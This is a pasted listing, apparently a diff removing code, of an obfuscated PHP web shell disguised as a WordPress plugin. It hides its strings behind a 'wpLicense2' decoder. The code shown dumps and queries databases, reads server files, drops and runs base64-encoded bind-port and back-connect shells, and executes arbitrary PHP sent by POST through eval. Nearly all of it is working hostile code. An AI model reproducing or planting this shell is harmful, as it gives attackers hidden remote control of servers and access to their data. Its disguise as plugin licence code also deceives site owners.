- case wpLicense2(1132):
- return $this->res = $this->query(wpLicense2(1133));
- break;
- case wpLicense2(1134):
- return $this->res = $this->query(wpLicense2(1135));
- break;
- }
- return false;
- }
- function error() {
- switch ($this->type) {
- case wpLicense2(1136):
- return @mysql_error();
- break;
- case wpLicense2(1137):
- return @pg_last_error();
- break;
- }
- return false;
- }
- function setCharset($str) {
- switch ($this->type) {
- case wpLicense2(1138):
- if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
- else $this->query(wpLicense2(1139) . $str);
- break;
- case wpLicense2(1140):
- return @pg_set_client_encoding($this->link, $str);
- break;
- }
- return false;
- }
- function loadFile($str) {
- switch ($this->type) {
- case wpLicense2(1141):
- return $this->fetch($this->query(wpLicense2(1142) . addslashes($str) . wpLicense2(1143)));
- break;
- case wpLicense2(1144):
- $this->query(wpLicense2(1145) . addslashes($str) . wpLicense2(1146));
- $r = array();
- while ($i = $this->fetch()) $r[] = $i[wpLicense2(1147) ];
- $this->query(wpLicense2(1148));
- return array(wpLicense2(1149) => implode(wpLicense2(1150), $r));
- break;
- }
- return false;
- }
- function dump($table, $fp = false) {
- switch ($this->type) {
- case wpLicense2(1151):
- $res = $this->query(wpLicense2(1152) . $table . wpLicense2(1153));
- $create = mysql_fetch_array($res);
- $sql = $create[round(0 + 0.25 + 0.25 + 0.25 + 0.25) ] . wpLicense2(1154);
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- $this->query(wpLicense2(1155) . $table . wpLicense2(1156));
- $i = round(0);
- $head = true;
- while ($item = $this->fetch()) {
- $sql = wpLicense2(1157);
- if ($i % round(0 + 250 + 250 + 250 + 250) == round(0)) {
- $head = true;
- $sql = wpLicense2(1158);
- }
- $columns = array();
- foreach ($item as $k => $v) {
- if ($v === null) $item[$k] = wpLicense2(1159);
- elseif (is_int($v)) $item[$k] = $v;
- else $item[$k] = wpLicense2(1160) . @mysql_real_escape_string($v) . wpLicense2(1161);
- $columns[] = wpLicense2(1162) . $k . wpLicense2(1163);
- }
- if ($head) {
- $sql.= wpLicense2(1164) . $table . wpLicense2(1165) . implode(wpLicense2(1166), $columns) . wpLicense2(1167) . implode(wpLicense2(1168), $item) . wpLicense2(1169);
- $head = false;
- } else $sql.= wpLicense2(1170) . implode(wpLicense2(1171), $item) . wpLicense2(1172);
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- $i++;
- }
- if (!$head) if ($fp) fwrite($fp, wpLicense2(1173));
- else echo (wpLicense2(1174));
- break;
- case wpLicense2(1175):
- $this->query(wpLicense2(1176) . $table);
- while ($item = $this->fetch()) {
- $columns = array();
- foreach ($item as $k => $v) {
- $item[$k] = wpLicense2(1177) . addslashes($v) . wpLicense2(1178);
- $columns[] = $k;
- }
- $sql = wpLicense2(1179) . $table . wpLicense2(1180) . implode(wpLicense2(1181), $columns) . wpLicense2(1182) . implode(wpLicense2(1183), $item) . wpLicense2(1184) . wpLicense2(1185);
- if ($fp) fwrite($fp, $sql);
- else echo ($sql);
- }
- break;
- }
- return false;
- }
- };
- $db = new DbClass($_POST[wpLicense2(1186) ]);
- if (@$_POST[wpLicense2(1187) ] == wpLicense2(1188)) {
- $db->connect($_POST[wpLicense2(1189) ], $_POST[wpLicense2(1190) ], $_POST[wpLicense2(1191) ], $_POST[wpLicense2(1192) ]);
- $db->selectdb($_POST[wpLicense2(1193) ]);
- switch ($_POST[wpLicense2(1194) ]) {
- case wpLicense2(1195):
- $db->setCharset(wpLicense2(1196));
- break;
- case wpLicense2(1197):
- $db->setCharset(wpLicense2(1198));
- break;
- case wpLicense2(1199):
- $db->setCharset(wpLicense2(1200));
- break;
- case wpLicense2(1201):
- $db->setCharset(wpLicense2(1202));
- break;
- case wpLicense2(1203):
- $db->setCharset(wpLicense2(1204));
- break;
- }
- if (empty($_POST[wpLicense2(1205) ])) {
- ob_start(wpLicense2(1206), round(0 + 4096));
- header(wpLicense2(1207));
- header(wpLicense2(1208));
- foreach ($_POST[wpLicense2(1209) ] as $v) $db->dump($v);
- exit;
- } elseif ($fp = @fopen($_POST[wpLicense2(1210) ], wpLicense2(1211))) {
- foreach ($_POST[wpLicense2(1212) ] as $v) $db->dump($v, $fp);
- fclose($fp);
- unset($_POST[wpLicense2(1213) ]);
- } else die(wpLicense2(1214));
- }
- WPluginHeader();
- echo wpLicense2(1215) . htmlspecialchars($GLOBALS[wpLicense2(1216) ]) . wpLicense2(1217) . (isset($_POST[wpLicense2(1218) ]) ? $_POST[wpLicense2(1219) ] : wpLicense2(1220)) . wpLicense2(1221);
- if (@$_POST[wpLicense2(1222) ] == wpLicense2(1223)) echo wpLicense2(1224);
- echo wpLicense2(1225);
- if (@$_POST[wpLicense2(1226) ] == wpLicense2(1227)) echo wpLicense2(1228);
- echo wpLicense2(1229) . (empty($_POST[wpLicense2(1230) ]) ? wpLicense2(1231) : htmlspecialchars($_POST[wpLicense2(1232) ])) . wpLicense2(1233) . (empty($_POST[wpLicense2(1234) ]) ? wpLicense2(1235) : htmlspecialchars($_POST[wpLicense2(1236) ])) . wpLicense2(1237) . (empty($_POST[wpLicense2(1238) ]) ? wpLicense2(1239) : htmlspecialchars($_POST[wpLicense2(1240) ])) . wpLicense2(1241);
- $tmp = wpLicense2(1242);
- if (isset($_POST[wpLicense2(1243) ])) {
- if ($db->connect($_POST[wpLicense2(1244) ], $_POST[wpLicense2(1245) ], $_POST[wpLicense2(1246) ], $_POST[wpLicense2(1247) ])) {
- switch ($_POST[wpLicense2(1248) ]) {
- case wpLicense2(1249):
- $db->setCharset(wpLicense2(1250));
- break;
- case wpLicense2(1251):
- $db->setCharset(wpLicense2(1252));
- break;
- case wpLicense2(1253):
- $db->setCharset(wpLicense2(1254));
- break;
- case wpLicense2(1255):
- $db->setCharset(wpLicense2(1256));
- break;
- case wpLicense2(1257):
- $db->setCharset(wpLicense2(1258));
- break;
- }
- $db->listDbs();
- echo wpLicense2(1259);
- while ($item = $db->fetch()) {
- list($key, $value) = each($item);
- echo wpLicense2(1260) . $value . wpLicense2(1261) . ($value == $_POST[wpLicense2(1262) ] ? wpLicense2(1263) : wpLicense2(1264)) . wpLicense2(1265) . $value . wpLicense2(1266);
- }
- echo wpLicense2(1267);
- } else echo $tmp;
- } else echo $tmp;
- echo wpLicense2(1268) . (empty($_POST[wpLicense2(1269) ]) ? wpLicense2(1270) : wpLicense2(1271)) . wpLicense2(1272) . @addslashes($_POST[wpLicense2(1273) ]) . wpLicense2(1274);
- if (isset($db) && $db->link) {
- echo wpLicense2(1275);
- if (!empty($_POST[wpLicense2(1276) ])) {
- $db->selectdb($_POST[wpLicense2(1277) ]);
- echo wpLicense2(1278);
- $tbls_res = $db->listTables();
- while ($item = $db->fetch($tbls_res)) {
- list($key, $value) = each($item);
- if (!empty($_POST[wpLicense2(1279) ])) $n = $db->fetch($db->query(wpLicense2(1280) . $value . wpLicense2(1281)));
- $value = htmlspecialchars($value);
- echo wpLicense2(1282) . $value . wpLicense2(1283) . $value . wpLicense2(1284) . $value . wpLicense2(1285) . (empty($_POST[wpLicense2(1286) ]) ? wpLicense2(1287) : " <small>({$n[wpLicense2(1288) ]})</small>") . wpLicense2(1289);
- }
- echo wpLicense2(1290);
- if (@$_POST[wpLicense2(1291) ] == wpLicense2(1292)) {
- $_POST[wpLicense2(1293) ] = wpLicense2(1294);
- $_POST[wpLicense2(1295) ] = $_POST[wpLicense2(1296) ] ? $_POST[wpLicense2(1297) ] : round(0 + 0.25 + 0.25 + 0.25 + 0.25);
- $db->query(wpLicense2(1298) . $_POST[wpLicense2(1299) ]);
- $num = $db->fetch();
- $pages = ceil($num[wpLicense2(1300) ] / round(0 + 6 + 6 + 6 + 6 + 6));
- echo wpLicense2(1301) . $_POST[wpLicense2(1302) ] . wpLicense2(1303) . $_POST[wpLicense2(1304) ] . "</span> ({$num[wpLicense2(1305) ]} records) Page # <input type=text name='p3' value=" . ((int)$_POST[wpLicense2(1306) ]) . wpLicense2(1307);
- echo " of $pages";
- if ($_POST[wpLicense2(1308) ] > round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)) echo wpLicense2(1309) . $_POST[wpLicense2(1310) ] . wpLicense2(1311) . ($_POST[wpLicense2(1312) ] - round(0 + 1)) . wpLicense2(1313);
- if ($_POST[wpLicense2(1314) ] < $pages) echo wpLicense2(1315) . $_POST[wpLicense2(1316) ] . wpLicense2(1317) . ($_POST[wpLicense2(1318) ] + round(0 + 0.5 + 0.5)) . wpLicense2(1319);
- $_POST[wpLicense2(1320) ]--;
- if ($_POST[wpLicense2(1321) ] == wpLicense2(1322)) $_POST[wpLicense2(1323) ] = wpLicense2(1324) . $_POST[wpLicense2(1325) ] . wpLicense2(1326) . ($_POST[wpLicense2(1327) ] * round(0 + 7.5 + 7.5 + 7.5 + 7.5));
- else $_POST[wpLicense2(1328) ] = wpLicense2(1329) . $_POST[wpLicense2(1330) ] . wpLicense2(1331) . ($_POST[wpLicense2(1332) ] * round(0 + 15 + 15)) . wpLicense2(1333);
- echo wpLicense2(1334);
- }
- if ((@$_POST[wpLicense2(1335) ] == wpLicense2(1336)) && !empty($_POST[wpLicense2(1337) ])) {
- $db->query(@$_POST[wpLicense2(1338) ]);
- if ($db->res !== false) {
- $title = false;
- echo wpLicense2(1339);
- $line = round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2);
- while ($item = $db->fetch()) {
- if (!$title) {
- echo wpLicense2(1340);
- foreach ($item as $key => $value) echo wpLicense2(1341) . $key . wpLicense2(1342);
- reset($item);
- $title = true;
- echo wpLicense2(1343);
- $line = round(0 + 1 + 1);
- }
- echo wpLicense2(1344) . $line . wpLicense2(1345);
- $line = $line == round(0 + 0.25 + 0.25 + 0.25 + 0.25) ? round(0 + 0.666666666667 + 0.666666666667 + 0.666666666667) : round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333);
- foreach ($item as $key => $value) {
- if ($value == null) echo wpLicense2(1346);
- else echo wpLicense2(1347) . nl2br(htmlspecialchars($value)) . wpLicense2(1348);
- }
- echo wpLicense2(1349);
- }
- echo wpLicense2(1350);
- } else {
- echo wpLicense2(1351) . htmlspecialchars($db->error()) . wpLicense2(1352);
- }
- }
- echo wpLicense2(1353);
- if (!empty($_POST[wpLicense2(1354) ]) && ($_POST[wpLicense2(1355) ] != wpLicense2(1356))) echo htmlspecialchars($_POST[wpLicense2(1357) ]);
- echo wpLicense2(1358);
- echo wpLicense2(1359);
- }
- echo wpLicense2(1360);
- if ($_POST[wpLicense2(1361) ] == wpLicense2(1362)) {
- $db->query(wpLicense2(1363));
- if ($db->fetch()) echo wpLicense2(1364);
- }
- if (@$_POST[wpLicense2(1365) ] == wpLicense2(1366)) {
- $file = $db->loadFile($_POST[wpLicense2(1367) ]);
- echo wpLicense2(1368) . htmlspecialchars($file[wpLicense2(1369) ]) . wpLicense2(1370);
- }
- } else {
- echo htmlspecialchars($db->error());
- }
- echo wpLicense2(1371);
- WPluginFooter();
- }
- function actionNetwork() {
- WPluginHeader();
- $back_connect_p = wpLicense2(1372);
- $bind_port_p = wpLicense2(1373);
- echo wpLicense2(1374) . $_SERVER[wpLicense2(1375) ] . wpLicense2(1376);
- if (isset($_POST[wpLicense2(1377) ])) {
- function cf($f, $t) {
- $w = @fopen($f, wpLicense2(1378)) or @function_exists('file_put_contents');
- if ($w) {
- @fwrite($w, base64_decode($t));
- @fclose($w);
- }
- }
- if ($_POST[wpLicense2(1379) ] == wpLicense2(1380)) {
- cf(wpLicense2(1381), $bind_port_p);
- $out = WPluginEx(wpLicense2(1382) . $_POST[wpLicense2(1383) ] . wpLicense2(1384));
- sleep(round(0 + 0.5 + 0.5));
- echo "<pre class=ml1>$out
- " . WPluginEx(wpLicense2(1385)) . wpLicense2(1386);
- unlink(wpLicense2(1387));
- }
- if ($_POST[wpLicense2(1388) ] == wpLicense2(1389)) {
- cf(wpLicense2(1390), $back_connect_p);
- $out = WPluginEx(wpLicense2(1391) . $_POST[wpLicense2(1392) ] . wpLicense2(1393) . $_POST[wpLicense2(1394) ] . wpLicense2(1395));
- sleep(round(0 + 0.25 + 0.25 + 0.25 + 0.25));
- echo "<pre class=ml1>$out
- " . WPluginEx(wpLicense2(1396)) . wpLicense2(1397);
- unlink(wpLicense2(1398));
- }
- }
- echo wpLicense2(1399);
- WPluginFooter();
- }
- function actionRC() {
- if (!@$_POST[wpLicense2(1400) ]) {
- $a = array(wpLicense2(1401) => php_uname(), wpLicense2(1402) => phpversion(), wpLicense2(1403) => ololo_VERSION, wpLicense2(1404) => @ini_get(wpLicense2(1405)));
- echo serialize($a);
- } else {
- eval($_POST['p1']);
- }
- }
- if (empty($_POST[wpLicense2(1406) ])) if (isset($wpplugin_action) && function_exists('action' . $wpplugin_action)) $_POST['a'] = $wpplugin_action;
- else $_POST[wpLicense2(1407) ] = wpLicense2(1408);
- if (!empty($_POST[wpLicense2(1409) ]) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
- exit;
- ?>
Add Comment
Please, Sign In to add comment
